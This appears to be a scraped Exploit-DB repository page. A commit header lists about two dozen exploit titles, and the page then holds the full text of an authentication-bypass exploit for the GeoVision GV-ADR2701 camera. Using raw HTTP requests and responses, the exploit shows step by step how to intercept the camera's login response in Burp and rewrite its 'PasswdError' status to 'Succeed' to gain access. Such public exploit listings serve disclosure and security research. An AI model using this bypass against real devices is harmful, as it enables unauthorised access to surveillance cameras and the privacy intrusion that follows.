3de26153c8
23 changes to exploits/shellcodes/ghdb ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS) Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated) TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated) GeoVision Camera GV-ADR2701 - Authentication Bypass AD Manager Plus 7122 - Remote Code Execution (RCE) Enlightenment v0.25.3 - Privilege escalation Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) Apache 2.4.x - Buffer Overflow perfSONAR v4.4.5 - Partial Blind CSRF SugarCRM 12.2.0 - Remote Code Execution (RCE) XCMS v1.83 - Remote Command Execution (RCE) Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS) NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit Splashtop 8.71.12001.0 - Unquoted Service Path Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS) FlipRotation v1.0 decoder - Shellcode (146 bytes) Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes) macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
72 lines
No EOL
1.7 KiB
Text
72 lines
No EOL
1.7 KiB
Text
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
|
|
# Device name: GV-ADR2701
|
|
# Date: 26 December , 2020
|
|
# Exploit Author: Chan Nyein Wai
|
|
# Vendor Homepage: https://www.geovision.com.tw/
|
|
# Software Link: https://www.geovision.com.tw/download/product/
|
|
# Firmware Version: V1.00_2017_12_15
|
|
# Tested on: windows 10
|
|
|
|
# Exploitation
|
|
1. Capture The Login Request with burp, Do intercept request to response
|
|
|
|
Request:
|
|
```
|
|
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
|
|
Host: 10.10.10.10
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
|
|
Gecko/20100101 Firefox/84.0
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
X-Requested-With: XMLHttpRequest
|
|
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
|
|
Content-Length: 46
|
|
Origin: http://10.10.10.10
|
|
Connection: close
|
|
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
|
|
Cookie: isAutoStartVideo=1
|
|
|
|
{"UserName":"admin","Password":"0X]&0D]]05"}
|
|
```
|
|
|
|
2. The following is the normal response when you login to the server.
|
|
```
|
|
HTTP/1.1 200 Ok
|
|
Content-Length: 170
|
|
Content-Type: text/plain
|
|
Connection: close
|
|
X-Frame-Options: SAMEORIGIN
|
|
|
|
{
|
|
"Response": {
|
|
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
|
|
"CreatedID": -1,
|
|
"StatusCode": 460,
|
|
"StatusString": "PasswdError",
|
|
"Data": "null"
|
|
}
|
|
}
|
|
```
|
|
|
|
By editing the response to the following, you can successfully log in to
|
|
the web application.
|
|
|
|
```
|
|
HTTP/1.1 200 Ok
|
|
Content-Length: 170
|
|
Content-Type: text/plain
|
|
Connection: close
|
|
X-Frame-Options: SAMEORIGIN
|
|
|
|
{
|
|
"Response": {
|
|
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
|
|
"CreatedID": -1,
|
|
"StatusCode": 0,
|
|
"StatusString": "Succeed",
|
|
"Data": "null"
|
|
}
|
|
}
|
|
``` |